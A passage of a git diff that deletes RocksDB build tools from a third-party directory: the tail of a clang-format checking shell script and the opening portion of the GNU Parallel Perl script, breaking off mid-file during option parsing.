-#     ln -s `git rev-parse --show-toplevel`/build_tools/format-diff.sh $PRE_COMMIT_SCRIPT_PATH
-#   fi
-# fi
-set -e
-
-uncommitted_code=`git diff HEAD`
-LAST_MASTER=`git merge-base master HEAD`
-
-# If there's no uncommitted changes, we assume user are doing post-commit
-# format check, in which case we'll check the modified lines since last commit
-# from master. Otherwise, we'll check format of the uncommitted code only.
-if [ -z "$uncommitted_code" ]
-then
-  # Check the format of last commit
-  diffs=$(git diff -U0 $LAST_MASTER^ | $CLANG_FORMAT_DIFF -p 1)
-else
-  # Check the format of uncommitted lines,
-  diffs=$(git diff -U0 HEAD | $CLANG_FORMAT_DIFF -p 1)
-fi
-
-if [ -z "$diffs" ]
-then
-  echo "Nothing needs to be reformatted!"
-  exit 0
-fi
-
-# Highlight the insertion/deletion from the clang-format-diff.py's output
-COLOR_END="\033[0m"
-COLOR_RED="\033[0;31m" 
-COLOR_GREEN="\033[0;32m" 
-
-echo -e "Detect lines that doesn't follow the format rules:\r"
-# Add the color to the diff. lines added will be green; lines removed will be red.
-echo "$diffs" | 
-  sed -e "s/\(^-.*$\)/`echo -e \"$COLOR_RED\1$COLOR_END\"`/" |
-  sed -e "s/\(^+.*$\)/`echo -e \"$COLOR_GREEN\1$COLOR_END\"`/"
-
-if [[ "$OPT" == *"-DTRAVIS"* ]]
-then
-  exit 1
-fi
-
-echo -e "Would you like to fix the format automatically (y/n): \c"
-
-# Make sure under any mode, we can read user input.
-exec < /dev/tty
-read to_fix
-
-if [ "$to_fix" != "y" ]
-then
-  exit 1
-fi
-
-# Do in-place format adjustment.
-if [ -z "$uncommitted_code" ]
-then
-  git diff -U0 $LAST_MASTER^ | $CLANG_FORMAT_DIFF -i -p 1
-else
-  git diff -U0 HEAD^ | $CLANG_FORMAT_DIFF -i -p 1
-fi
-echo "Files reformatted!"
-
-# Amend to last commit if user do the post-commit format check
-if [ -z "$uncommitted_code" ]; then
-  echo -e "Would you like to amend the changes to last commit (`git log HEAD --oneline | head -1`)? (y/n): \c"
-  read to_amend
-
-  if [ "$to_amend" == "y" ]
-  then
-    git commit -a --amend --reuse-message HEAD
-    echo "Amended to last commit"
-  fi
-fi
diff --git a/thirdparty/rocksdb/build_tools/gnu_parallel b/thirdparty/rocksdb/build_tools/gnu_parallel
deleted file mode 100755
index abbf8f1..0000000
--- a/thirdparty/rocksdb/build_tools/gnu_parallel
+++ /dev/null
@@ -1,7936 +0,0 @@
-#!/usr/bin/env perl
-
-# Copyright (C) 2007,2008,2009,2010,2011,2012,2013,2014 Ole Tange and
-# Free Software Foundation, Inc.
-#
-# This program is free software; you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation; either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful, but
-# WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-# General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program; if not, see <http://www.gnu.org/licenses/>
-# or write to the Free Software Foundation, Inc., 51 Franklin St,
-# Fifth Floor, Boston, MA 02110-1301 USA
-
-# open3 used in Job::start
-use IPC::Open3;
-# &WNOHANG used in reaper
-use POSIX qw(:sys_wait_h setsid ceil :errno_h);
-# gensym used in Job::start
-use Symbol qw(gensym);
-# tempfile used in Job::start
-use File::Temp qw(tempfile tempdir);
-# mkpath used in openresultsfile
-use File::Path;
-# GetOptions used in get_options_from_array
-use Getopt::Long;
-# Used to ensure code quality
-use strict;
-use File::Basename;
-
-if(not $ENV{HOME}) {
-    # $ENV{HOME} is sometimes not set if called from PHP
-    ::warning("\$HOME not set. Using /tmp\n");
-    $ENV{HOME} = "/tmp";
-}
-
-save_stdin_stdout_stderr();
-save_original_signal_handler();
-parse_options();
-::debug("init", "Open file descriptors: ", join(" ",keys %Global::fd), "\n");
-my $number_of_args;
-if($Global::max_number_of_args) {
-    $number_of_args=$Global::max_number_of_args;
-} elsif ($opt::X or $opt::m or $opt::xargs) {
-    $number_of_args = undef;
-} else {
-    $number_of_args = 1;
-}
-
-my @command;
-@command = @ARGV;
-
-my @fhlist;
-if($opt::pipepart) {
-    @fhlist = map { open_or_exit($_) } "/dev/null";
-} else {
-    @fhlist = map { open_or_exit($_) } @opt::a;
-    if(not @fhlist and not $opt::pipe) {
-	@fhlist = (*STDIN);
-    }
-}
-
-if($opt::skip_first_line) {
-    # Skip the first line for the first file handle
-    my $fh = $fhlist[0];
-    <$fh>;
-}
-if($opt::header and not $opt::pipe) {
-    my $fh = $fhlist[0];
-    # split with colsep or \t
-    # $header force $colsep = \t if undef?
-    my $delimiter = $opt::colsep;
-    $delimiter ||= "\$";
-    my $id = 1;
-    for my $fh (@fhlist) {
-	my $line = <$fh>;
-	chomp($line);
-	::debug("init", "Delimiter: '$delimiter'");
-	for my $s (split /$delimiter/o, $line) {
-	    ::debug("init", "Colname: '$s'");
-	    # Replace {colname} with {2}
-	    # TODO accept configurable short hands
-	    # TODO how to deal with headers in {=...=}
-	    for(@command) {
-	      s:\{$s(|/|//|\.|/\.)\}:\{$id$1\}:g;
-	    }
-	    $Global::input_source_header{$id} = $s;
-	    $id++;
-	}
-    }
-} else {
-    my $id = 1;
-    for my $fh (@fhlist) {
-	$Global::input_source_header{$id} = $id;
-	$id++;
-    }
-}
-
-if($opt::filter_hosts and (@opt::sshlogin or @opt::sshloginfile)) {
-    # Parallel check all hosts are up. Remove hosts that are down
-    filter_hosts();
-}
-
-if($opt::nonall or $opt::onall) {
-    onall(@command);
-    wait_and_exit(min(undef_as_zero($Global::exitstatus),254));
-}
-
-# TODO --transfer foo/./bar --cleanup
-# multiple --transfer and --basefile with different /./
-
-$Global::JobQueue = JobQueue->new(
-    \@command,\@fhlist,$Global::ContextReplace,$number_of_args,\@Global::ret_files);
-
-if($opt::eta or $opt::bar) {
-    # Count the number of jobs before starting any
-    $Global::JobQueue->total_jobs();
-}
-if($opt::pipepart) {
-    @Global::cat_partials = map { pipe_part_files($_) } @opt::a;
-    # Unget the command as many times as there are parts
-    $Global::JobQueue->{'commandlinequeue'}->unget(
-	map { $Global::JobQueue->{'commandlinequeue'}->get() } @Global::cat_partials
-	);
-}
-for my $sshlogin (values %Global::host) {
-    $sshlogin->max_jobs_running();
-}
-
-init_run_jobs();
-my $sem;
-if($Global::semaphore) {
-    $sem = acquire_semaphore();
-}
-$SIG{TERM} = \&start_no_new_jobs;
-
-start_more_jobs();
-if(not $opt::pipepart) {
-    if($opt::pipe) {
-	spreadstdin();
-    }
-}
-::debug("init", "Start draining\n");
-drain_job_queue();
-::debug("init", "Done draining\n");
-reaper();
-::debug("init", "Done reaping\n");
-if($opt::pipe and @opt::a) {
-    for my $job (@Global::tee_jobs) {
-	unlink $job->fh(2,"name");
-	$job->set_fh(2,"name","");
-	$job->print();
-	unlink $job->fh(1,"name");
-    }
-}
-::debug("init", "Cleaning\n");
-cleanup();
-if($Global::semaphore) {
-    $sem->release();
-}
-for(keys %Global::sshmaster) {
-    kill "TERM", $_;
-}
-::debug("init", "Halt\n");
-if($opt::halt_on_error) {
-    wait_and_exit($Global::halt_on_error_exitstatus);
-} else {
-    wait_and_exit(min(undef_as_zero($Global::exitstatus),254));
-}
-
-sub __PIPE_MODE__ {}
-
-sub pipe_part_files {
-    # Input:
-    #   $file = the file to read
-    # Returns:
-    #   @commands that will cat_partial each part
-    my ($file) = @_;
-    my $buf = "";
-    my $header = find_header(\$buf,open_or_exit($file));
-    # find positions
-    my @pos = find_split_positions($file,$opt::blocksize,length $header);
-    # Make @cat_partials
-    my @cat_partials = ();
-    for(my $i=0; $i<$#pos; $i++) {
-	push @cat_partials, cat_partial($file, 0, length($header), $pos[$i], $pos[$i+1]);
-    }
-    # Remote exec should look like:
-    #  ssh -oLogLevel=quiet lo  'eval `echo $SHELL | grep "/t\{0,1\}csh" > /dev/null  && echo setenv PARALLEL_SEQ '$PARALLEL_SEQ'\;  setenv PARALLEL_PID '$PARALLEL_PID'  || echo PARALLEL_SEQ='$PARALLEL_SEQ'\;export PARALLEL_SEQ\;  PARALLEL_PID='$PARALLEL_PID'\;export PARALLEL_PID` ;'  tty\ \>/dev/null\ \&\&\ stty\ isig\ -onlcr\ -echo\;echo\ \$SHELL\ \|\ grep\ \"/t\\\{0,1\\\}csh\"\ \>\ /dev/null\ \&\&\ setenv\ FOO\ /tmp/foo\ \|\|\ export\ FOO=/tmp/foo\; \(wc\ -\ \$FOO\)
-    # ssh -tt not allowed. Remote will die due to broken pipe anyway.
-    # TODO test remote with --fifo / --cat
-    return @cat_partials;
-}
-
-sub find_header {
-    # Input:
-    #   $buf_ref = reference to read-in buffer
-    #   $fh = filehandle to read from
-    # Uses:
-    #   $opt::header
-    #   $opt::blocksize
-    # Returns:
-    #   $header string
-    my ($buf_ref, $fh) = @_;
-    my $header = "";
-    if($opt::header) {
-	if($opt::header eq ":") { $opt::header = "(.*\n)"; }
-	# Number = number of lines
-	$opt::header =~ s/^(\d+)$/"(.*\n)"x$1/e;
-	while(read($fh,substr($$buf_ref,length $$buf_ref,0),$opt::blocksize)) {
-	    if($$buf_ref=~s/^($opt::header)//) {
-		$header = $1;
-		last;
-	    }
-	}
-    }
-    return $header;
-}
-
-sub find_split_positions {
-    # Input:
-    #   $file = the file to read
-    #   $block = (minimal) --block-size of each chunk
-    #   $headerlen = length of header to be skipped
-    # Uses:
-    #   $opt::recstart
-    #   $opt::recend
-    # Returns:
-    #   @positions of block start/end
-    my($file, $block, $headerlen) = @_;
-    my $size = -s $file;
-    $block = int $block;
-    # The optimal dd blocksize for mint, redhat, solaris, openbsd = 2^17..2^20
-    # The optimal dd blocksize for freebsd = 2^15..2^17
-    my $dd_block_size = 131072; # 2^17
-    my @pos;
-    my ($recstart,$recend) = recstartrecend();
-    my $recendrecstart = $recend.$recstart;
-    my $fh = ::open_or_exit($file);
-    push(@pos,$headerlen);
-    for(my $pos = $block+$headerlen; $pos < $size; $pos += $block) {
-	my $buf;
-	seek($fh, $pos, 0) || die;
-	while(read($fh,substr($buf,length $buf,0),$dd_block_size)) {
-	    if($opt::regexp) {
-		# If match /$recend$recstart/ => Record position
-		if($buf =~ /(.*$recend)$recstart/os) {
-		    my $i = length($1);
-		    push(@pos,$pos+$i);
-		    # Start looking for next record _after_ this match
-		    $pos += $i;
-		    last;
-		}
-	    } else {
-		# If match $recend$recstart => Record position
-		my $i = index($buf,$recendrecstart);
-		if($i != -1) {
-		    push(@pos,$pos+$i);
-		    # Start looking for next record _after_ this match
-		    $pos += $i;
-		    last;
-		}
-	    }
-	}
-    }
-    push(@pos,$size);
-    close $fh;
-    return @pos;
-}
-
-sub cat_partial {
-    # Input:
-    #   $file = the file to read
-    #   ($start, $end, [$start2, $end2, ...]) = start byte, end byte
-    # Returns:
-    #   Efficient perl command to copy $start..$end, $start2..$end2, ... to stdout
-    my($file, @start_end) = @_;
-    my($start, $i);
-    # Convert start_end to start_len
-    my @start_len = map { if(++$i % 2) { $start = $_; } else { $_-$start } } @start_end;
-    return "<". shell_quote_scalar($file) .
-	q{ perl -e 'while(@ARGV) { sysseek(STDIN,shift,0) || die; $left = shift; while($read = sysread(STDIN,$buf, ($left > 32768 ? 32768 : $left))){ $left -= $read; syswrite(STDOUT,$buf); } }' } .
-	" @start_len";
-}
-
-sub spreadstdin {
-    # read a record
-    # Spawn a job and print the record to it.
-    # Uses:
-    #   $opt::blocksize
-    #   STDIN
-    #   $opr::r
-    #   $Global::max_lines
-    #   $Global::max_number_of_args
-    #   $opt::regexp
-    #   $Global::start_no_new_jobs
-    #   $opt::roundrobin
-    #   %Global::running
-
-    my $buf = "";
-    my ($recstart,$recend) = recstartrecend();
-    my $recendrecstart = $recend.$recstart;
-    my $chunk_number = 1;
-    my $one_time_through;
-    my $blocksize = $opt::blocksize;
-    my $in = *STDIN;
-    my $header = find_header(\$buf,$in);
-    while(1) {
-      my $anything_written = 0;
-      if(not read($in,substr($buf,length $buf,0),$blocksize)) {
-	  # End-of-file
-	  $chunk_number != 1 and last;
-	  # Force the while-loop once if everything was read by header reading
-	  $one_time_through++ and last;
-      }
-      if($opt::r) {
-	  # Remove empty lines
-	  $buf =~ s/^\s*\n//gm;
-	  if(length $buf == 0) {
-	      next;
-	  }
-      }
-      if($Global::max_lines and not $Global::max_number_of_args) {
-	  # Read n-line records
-	  my $n_lines = $buf =~ tr/\n/\n/;
-	  my $last_newline_pos = rindex($buf,"\n");
-	  while($n_lines % $Global::max_lines) {
-	      $n_lines--;
-	      $last_newline_pos = rindex($buf,"\n",$last_newline_pos-1);
-	  }
-	  # Chop at $last_newline_pos as that is where n-line record ends
-	  $anything_written +=
-	      write_record_to_pipe($chunk_number++,\$header,\$buf,
-				   $recstart,$recend,$last_newline_pos+1);
-	  substr($buf,0,$last_newline_pos+1) = "";
-      } elsif($opt::regexp) {
-	  if($Global::max_number_of_args) {
-	      # -N => (start..*?end){n}
-	      # -L -N => (start..*?end){n*l}
-	      my $read_n_lines = $Global::max_number_of_args * ($Global::max_lines || 1);
-	      while($buf =~ s/((?:$recstart.*?$recend){$read_n_lines})($recstart.*)$/$2/os) {
-		  # Copy to modifiable variable
-		  my $b = $1;
-		  $anything_written +=
-		      write_record_to_pipe($chunk_number++,\$header,\$b,
-					   $recstart,$recend,length $1);
-	      }
-	  } else {
-	      # Find the last recend-recstart in $buf
-	      if($buf =~ s/(.*$recend)($recstart.*?)$/$2/os) {
-		  # Copy to modifiable variable
-		  my $b = $1;
-		  $anything_written +=
-		      write_record_to_pipe($chunk_number++,\$header,\$b,
-					   $recstart,$recend,length $1);
-	      }
-	  }
-      } else {
-	  if($Global::max_number_of_args) {
-	      # -N => (start..*?end){n}
-	      my $i = 0;
-	      my $read_n_lines = $Global::max_number_of_args * ($Global::max_lines || 1);
-	      while(($i = nindex(\$buf,$recendrecstart,$read_n_lines)) != -1) {
-		  $i += length $recend; # find the actual splitting location
-		  $anything_written +=
-		      write_record_to_pipe($chunk_number++,\$header,\$buf,
-					   $recstart,$recend,$i);
-		  substr($buf,0,$i) = "";
-	      }
-	  } else {
-	      # Find the last recend-recstart in $buf
-	      my $i = rindex($buf,$recendrecstart);
-	      if($i != -1) {
-		  $i += length $recend; # find the actual splitting location
-		  $anything_written +=
-		      write_record_to_pipe($chunk_number++,\$header,\$buf,
-					   $recstart,$recend,$i);
-		  substr($buf,0,$i) = "";
-	      }
-	  }
-      }
-      if(not $anything_written and not eof($in)) {
-	  # Nothing was written - maybe the block size < record size?
-	  # Increase blocksize exponentially
-	  my $old_blocksize = $blocksize;
-	  $blocksize = ceil($blocksize * 1.3 + 1);
-	  ::warning("A record was longer than $old_blocksize. " .
-		    "Increasing to --blocksize $blocksize\n");
-      }
-    }
-    ::debug("init", "Done reading input\n");
-
-    # If there is anything left in the buffer write it
-    substr($buf,0,0) = "";
-    write_record_to_pipe($chunk_number++,\$header,\$buf,$recstart,$recend,length $buf);
-
-    $Global::start_no_new_jobs ||= 1;
-    if($opt::roundrobin) {
-	for my $job (values %Global::running) {
-	    close $job->fh(0,"w");
-	}
-	my %incomplete_jobs = %Global::running;
-	my $sleep = 1;
-	while(keys %incomplete_jobs) {
-	    my $something_written = 0;
-	    for my $pid (keys %incomplete_jobs) {
-		my $job = $incomplete_jobs{$pid};
-		if($job->stdin_buffer_length()) {
-		    $something_written += $job->non_block_write();
-		} else {
-		    delete $incomplete_jobs{$pid}
-		}
-	    }
-	    if($something_written) {
-		$sleep = $sleep/2+0.001;
-	    }
-	    $sleep = ::reap_usleep($sleep);
-	}
-    }
-}
-
-sub recstartrecend {
-    # Uses:
-    #   $opt::recstart
-    #   $opt::recend
-    # Returns:
-    #   $recstart,$recend with default values and regexp conversion
-    my($recstart,$recend);
-    if(defined($opt::recstart) and defined($opt::recend)) {
-	# If both --recstart and --recend is given then both must match
-	$recstart = $opt::recstart;
-	$recend = $opt::recend;
-    } elsif(defined($opt::recstart)) {
-	# If --recstart is given it must match start of record
-	$recstart = $opt::recstart;
-	$recend = "";
-    } elsif(defined($opt::recend)) {
-	# If --recend is given then it must match end of record
-	$recstart = "";
-	$recend = $opt::recend;
-    }
-
-    if($opt::regexp) {
-	# If $recstart/$recend contains '|' this should only apply to the regexp
-	$recstart = "(?:".$recstart.")";
-	$recend = "(?:".$recend.")";
-    } else {
-	# $recstart/$recend = printf strings (\n)
-	$recstart =~ s/\\([0rnt\'\"\\])/"qq|\\$1|"/gee;
-	$recend =~ s/\\([0rnt\'\"\\])/"qq|\\$1|"/gee;
-    }
-    return ($recstart,$recend);
-}
-
-sub nindex {
-    # See if string is in buffer N times
-    # Returns:
-    #   the position where the Nth copy is found
-    my ($buf_ref, $str, $n) = @_;
-    my $i = 0;
-    for(1..$n) {
-	$i = index($$buf_ref,$str,$i+1);
-	if($i == -1) { last }
-    }
-    return $i;
-}
-
-{
-    my @robin_queue;
-
-    sub round_robin_write {
-	# Input:
-	#   $header_ref = ref to $header string
-	#   $block_ref = ref to $block to be written
-	#   $recstart = record start string
-	#   $recend = record end string
-	#   $endpos = end position of $block
-	# Uses:
-	#   %Global::running
-	my ($header_ref,$block_ref,$recstart,$recend,$endpos) = @_;
-	my $something_written = 0;
-	my $block_passed = 0;
-	my $sleep = 1;
-	while(not $block_passed) {
-	    # Continue flushing existing buffers
-	    # until one is empty and a new block is passed
-	    # Make a queue to spread the blocks evenly
-	    if(not @robin_queue) {
-		push @robin_queue, values %Global::running;
-	    }
-	    while(my $job = shift @robin_queue) {
-		if($job->stdin_buffer_length() > 0) {
-		    $something_written += $job->non_block_write();
-		} else {
-		    $job->set_stdin_buffer($header_ref,$block_ref,$endpos,$recstart,$recend);
-		    $block_passed = 1;
-		    $job->set_virgin(0);
-		    $something_written += $job->non_block_write();
-		    last;
-		}
-	    }
-	    $sleep = ::reap_usleep($sleep);
-	}
-	return $something_written;
-    }
-}
-
-sub write_record_to_pipe {
-    # Fork then
-    # Write record from pos 0 .. $endpos to pipe
-    # Input:
-    #   $chunk_number = sequence number - to see if already run
-    #   $header_ref = reference to header string to prepend
-    #   $record_ref = reference to record to write
-    #   $recstart = start string of record
-    #   $recend = end string of record
-    #   $endpos = position in $record_ref where record ends
-    # Uses:
-    #   $Global::job_already_run
-    #   $opt::roundrobin
-    #   @Global::virgin_jobs
-    # Returns:
-    #   Number of chunks written (0 or 1)
-    my ($chunk_number,$header_ref,$record_ref,$recstart,$recend,$endpos) = @_;
-    if($endpos == 0) { return 0; }
-    if(vec($Global::job_already_run,$chunk_number,1)) { return 1; }
-    if($opt::roundrobin) {
-	return round_robin_write($header_ref,$record_ref,$recstart,$recend,$endpos);
-    }
-    # If no virgin found, backoff
-    my $sleep = 0.0001; # 0.01 ms - better performance on highend
-    while(not @Global::virgin_jobs) {
-	::debug("pipe", "No virgin jobs");
-	$sleep = ::reap_usleep($sleep);
-	# Jobs may not be started because of loadavg
-	# or too little time between each ssh login.
-	start_more_jobs();
-    }
-    my $job = shift @Global::virgin_jobs;
-    # Job is no longer virgin
-    $job->set_virgin(0);
-    if(fork()) {
-	# Skip
-    } else {
-	# Chop of at $endpos as we do not know how many rec_sep will
-	# be removed.
-	substr($$record_ref,$endpos,length $$record_ref) = "";
-	# Remove rec_sep
-	if($opt::remove_rec_sep) {
-	    Job::remove_rec_sep($record_ref,$recstart,$recend);
-	}
-	$job->write($header_ref);
-	$job->write($record_ref);
-	close $job->fh(0,"w");
-	exit(0);
-    }
-    close $job->fh(0,"w");
-    return 1;
-}
-
-sub __SEM_MODE__ {}
-
-sub acquire_semaphore {
-    # Acquires semaphore. If needed: spawns to the background
-    # Uses:
-    #   @Global::host
-    # Returns:
-    #   The semaphore to be released when jobs is complete
-    $Global::host{':'} = SSHLogin->new(":");
-    my $sem = Semaphore->new($Semaphore::name,$Global::host{':'}->max_jobs_running());
-    $sem->acquire();
-    if($Semaphore::fg) {
-	# skip
-    } else {
-	# If run in the background, the PID will change
-	# therefore release and re-acquire the semaphore
-	$sem->release();
-	if(fork()) {
-	    exit(0);
-	} else {
-	    # child
-	    # Get a semaphore for this pid
-	    ::die_bug("Can't start a new session: $!") if setsid() == -1;
-	    $sem = Semaphore->new($Semaphore::name,$Global::host{':'}->max_jobs_running());
-	    $sem->acquire();
-	}
-    }
-    return $sem;
-}
-
-sub __PARSE_OPTIONS__ {}
-
-sub options_hash {
-    # Returns:
-    #   %hash = the GetOptions config
-    return
-	("debug|D=s" => \$opt::D,
-	 "xargs" => \$opt::xargs,
-	 "m" => \$opt::m,
-	 "X" => \$opt::X,
-	 "v" => \@opt::v,
-	 "joblog=s" => \$opt::joblog,
-	 "results|result|res=s" => \$opt::results,
-	 "resume" => \$opt::resume,
-	 "resume-failed|resumefailed" => \$opt::resume_failed,
-	 "silent" => \$opt::silent,
-	 #"silent-error|silenterror" => \$opt::silent_error,
-	 "keep-order|keeporder|k" => \$opt::keeporder,
-	 "group" => \$opt::group,
-	 "g" => \$opt::retired,
-	 "ungroup|u" => \$opt::ungroup,
-	 "linebuffer|linebuffered|line-buffer|line-buffered" => \$opt::linebuffer,
-	 "tmux" => \$opt::tmux,
-	 "null|0" => \$opt::0,
-	 "quote|q" => \$opt::q,
-	 # Replacement strings
-	 "parens=s" => \$opt::parens,
-	 "rpl=s" => \@opt::rpl,
-	 "plus" => \$opt::plus,
-	 "I=s" => \$opt::I,
-	 "extensionreplace|er=s" => \$opt::U,
-	 "U=s" => \$opt::retired,
-	 "basenamereplace|bnr=s" => \$opt::basenamereplace,
-	 "dirnamereplace|dnr=s" => \$opt::dirnamereplace,
-	 "basenameextensionreplace|bner=s" => \$opt::basenameextensionreplace,
-	 "seqreplace=s" => \$opt::seqreplace,
-	 "slotreplace=s" => \$opt::slotreplace,
-	 "jobs|j=s" => \$opt::jobs,
-	 "delay=f" => \$opt::delay,
-	 "sshdelay=f" => \$opt::sshdelay,
-	 "load=s" => \$opt::load,
-	 "noswap" => \$opt::noswap,
-	 "max-line-length-allowed" => \$opt::max_line_length_allowed,
-	 "number-of-cpus" => \$opt::number_of_cpus,
-	 "number-of-cores" => \$opt::number_of_cores,
-	 "use-cpus-instead-of-cores" => \$opt::use_cpus_instead_of_cores,
-	 "shellquote|shell_quote|shell-quote" => \$opt::shellquote,
-	 "nice=i" => \$opt::nice,
-	 "timeout=s" => \$opt::timeout,
-	 "tag" => \$opt::tag,
-	 "tagstring|tag-string=s" => \$opt::tagstring,
-	 "onall" => \$opt::onall,
-	 "nonall" => \$opt::nonall,
-	 "filter-hosts|filterhosts|filter-host" => \$opt::filter_hosts,
-	 "sshlogin|S=s" => \@opt::sshlogin,
-	 "sshloginfile|slf=s" => \@opt::sshloginfile,
-	 "controlmaster|M" => \$opt::controlmaster,
-	 "return=s" => \@opt::return,
-	 "trc=s" => \@opt::trc,
-	 "transfer" => \$opt::transfer,
-	 "cleanup" => \$opt::cleanup,
-	 "basefile|bf=s" => \@opt::basefile,
-	 "B=s" => \$opt::retired,
-	 "ctrlc|ctrl-c" => \$opt::ctrlc,
-	 "noctrlc|no-ctrlc|no-ctrl-c" => \$opt::noctrlc,
-	 "workdir|work-dir|wd=s" => \$opt::workdir,
-	 "W=s" => \$opt::retired,
-	 "tmpdir=s" => \$opt::tmpdir,
-	 "tempdir=s" => \$opt::tmpdir,
-	 "use-compress-program|compress-program=s" => \$opt::compress_program,
-	 "use-decompress-program|decompress-program=s" => \$opt::decompress_program,
-	 "compress" => \$opt::compress,
-	 "tty" => \$opt::tty,
-	 "T" => \$opt::retired,
-	 "halt-on-error|halt=s" => \$opt::halt_on_error,
-	 "H=i" => \$opt::retired,
-	 "retries=i" => \$opt::retries,
-	 "dry-run|dryrun" => \$opt::dryrun,
-	 "progress" => \$opt::progress,
-	 "eta" => \$opt::eta,
-	 "bar" => \$opt::bar,
-	 "arg-sep|argsep=s" => \$opt::arg_sep,
-	 "arg-file-sep|argfilesep=s" => \$opt::arg_file_sep,
-	 "trim=s" => \$opt::trim,
-	 "env=s" => \@opt::env,
-	 "recordenv|record-env" => \$opt::record_env,
-	 "plain" => \$opt::plain,
-	 "profile|J=s" => \@opt::profile,
-	 "pipe|spreadstdin" => \$opt::pipe,
-	 "robin|round-robin|roundrobin" => \$opt::roundrobin,
-	 "recstart=s" => \$opt::recstart,
-	 "recend=s" => \$opt::recend,
-	 "regexp|regex" => \$opt::regexp,
-	 "remove-rec-sep|removerecsep|rrs" => \$opt::remove_rec_sep,
-	 "files|output-as-files|outputasfiles" => \$opt::files,
-	 "block|block-size|blocksize=s" => \$opt::blocksize,
-	 "tollef" => \$opt::retired,
-	 "gnu" => \$opt::gnu,
-	 "xapply" => \$opt::xapply,
-	 "bibtex" => \$opt::bibtex,
-	 "nn|nonotice|no-notice" => \$opt::no_notice,
-	 # xargs-compatibility - implemented, man, testsuite
-	 "max-procs|P=s" => \$opt::jobs,
-	 "delimiter|d=s" => \$opt::d,
-	 "max-chars|s=i" => \$opt::max_chars,
-	 "arg-file|a=s" => \@opt::a,
-	 "no-run-if-empty|r" => \$opt::r,
-	 "replace|i:s" => \$opt::i,
-	 "E=s" => \$opt::eof,
-	 "eof|e:s" => \$opt::eof,
-	 "max-args|n=i" => \$opt::max_args,
-	 "max-replace-args|N=i" => \$opt::max_replace_args,
-	 "colsep|col-sep|C=s" => \$opt::colsep,
-	 "help|h" => \$opt::help,
-	 "L=f" => \$opt::L,
-	 "max-lines|l:f" => \$opt::max_lines,
-	 "interactive|p" => \$opt::p,
-	 "verbose|t" => \$opt::verbose,
-	 "version|V" => \$opt::version,
-	 "minversion|min-version=i" => \$opt::minversion,
-	 "show-limits|showlimits" => \$opt::show_limits,
-	 "exit|x" => \$opt::x,
-	 # Semaphore
-	 "semaphore" => \$opt::semaphore,
-	 "semaphoretimeout=i" => \$opt::semaphoretimeout,
-	 "semaphorename|id=s" => \$opt::semaphorename,
-	 "fg" => \$opt::fg,
-	 "bg" => \$opt::bg,
-	 "wait" => \$opt::wait,
-	 # Shebang #!/usr/bin/parallel --shebang
-	 "shebang|hashbang" => \$opt::shebang,
-	 "internal-pipe-means-argfiles" => \$opt::internal_pipe_means_argfiles,
-	 "Y" => \$opt::retired,
-         "skip-first-line" => \$opt::skip_first_line,
-	 "header=s" => \$opt::header,
-	 "cat" => \$opt::cat,
-	 "fifo" => \$opt::fifo,
-	 "pipepart|pipe-part" => \$opt::pipepart,
-	 "hgrp|hostgroup|hostgroups" => \$opt::hostgroups,
-	);
-}
-
-sub get_options_from_array {
-    # Run GetOptions on @array
-    # Input:
-    #   $array_ref = ref to @ARGV to parse
-    #   @keep_only = Keep only these options
-    # Uses:
-    #   @ARGV
-    # Returns:
-    #   true if parsing worked
-    #   false if parsing failed
-    #   @$array_ref is changed
-    my ($array_ref, @keep_only) = @_;
-    if(not @$array_ref) {
-	# Empty array: No need to look more at that
-	return 1;
-    }
-    # A bit of shuffling of @ARGV needed as GetOptionsFromArray is not
-    # supported everywhere
-    my @save_argv;
-    my $this_is_ARGV = (\@::ARGV == $array_ref);
-    if(not $this_is_ARGV) {
-	@save_argv = @::ARGV;
-	@::ARGV = @{$array_ref};
-    }
-    # If @keep_only set: Ignore all values except @keep_only
-    my %options = options_hash();
-    if(@keep_only) {
-	my (%keep,@dummy);
-	@keep{@keep_only} = @keep_only;
-	for my $k (grep { not $keep{$_} } keys %options) {
-	    # Store the value of the option in @dummy
-	    $options{$k} = \@dummy;
-	}
-    }
-    my $retval = GetOptions(%options);
-    if(not $this_is_ARGV) {
-	@{$array_ref} = @::ARGV;
-	@::ARGV = @save_argv;
-    }
-    return $retval;
-}
-
-sub parse_options {
-    # Returns: N/A
-    # Defaults:
-    $Global::version = 20141122;
-    $Global::progname = 'parallel';
-    $Global::infinity = 2**31;
-    $Global::debug = 0;
-    $Global::verbose = 0;
-    $Global::quoting = 0;
-    # Read only table with default --rpl values
-    %Global::replace =
-	(
-	 '{}'   => '',
-	 '{#}'  => '1 $_=$job->seq()',
-	 '{%}'  => '1 $_=$job->slot()',
-	 '{/}'  => 's:.*/::',
-	 '{//}' => '$Global::use{"File::Basename"} ||= eval "use File::Basename; 1;"; $_ = dirname($_);',
-	 '{/.}' => 's:.*/::; s:\.[^/.]+$::;',
-	 '{.}'  => 's:\.[^/.]+$::',
-	);
-    %Global::plus =
-	(
-	 # {} = {+/}/{/}
-	 #    = {.}.{+.}     = {+/}/{/.}.{+.}
-	 #    = {..}.{+..}   = {+/}/{/..}.{+..}
-	 #    = {...}.{+...} = {+/}/{/...}.{+...}
-	 '{+/}' => 's:/[^/]*$::',
-	 '{+.}' => 's:.*\.::',
-	 '{+..}' => 's:.*\.([^.]*\.):$1:',
-	 '{+...}' => 's:.*\.([^.]*\.[^.]*\.):$1:',
-	 '{..}' => 's:\.[^/.]+$::; s:\.[^/.]+$::',
-	 '{...}' => 's:\.[^/.]+$::; s:\.[^/.]+$::; s:\.[^/.]+$::',
-	 '{/..}' => 's:.*/::; s:\.[^/.]+$::; s:\.[^/.]+$::',
-	 '{/...}' => 's:.*/::; s:\.[^/.]+$::; s:\.[^/.]+$::; s:\.[^/.]+$::',
-	);
-    # Modifiable copy of %Global::replace
-    %Global::rpl = %Global::replace;
-    $Global::parens = "{==}";
-    $/="\n";
-    $Global::ignore_empty = 0;
-    $Global::interactive = 0;
-    $Global::stderr_verbose = 0;
-    $Global::default_simultaneous_sshlogins = 9;
-    $Global::exitstatus = 0;
-    $Global::halt_on_error_exitstatus = 0;
-    $Global::arg_sep = ":::";
-    $Global::arg_file_sep = "::::";
-    $Global::trim = 'n';
-    $Global::max_jobs_running = 0;
-    $Global::job_already_run = '';
-    $ENV{'TMPDIR'} ||= "/tmp";
-
-    @ARGV=read_options();
-
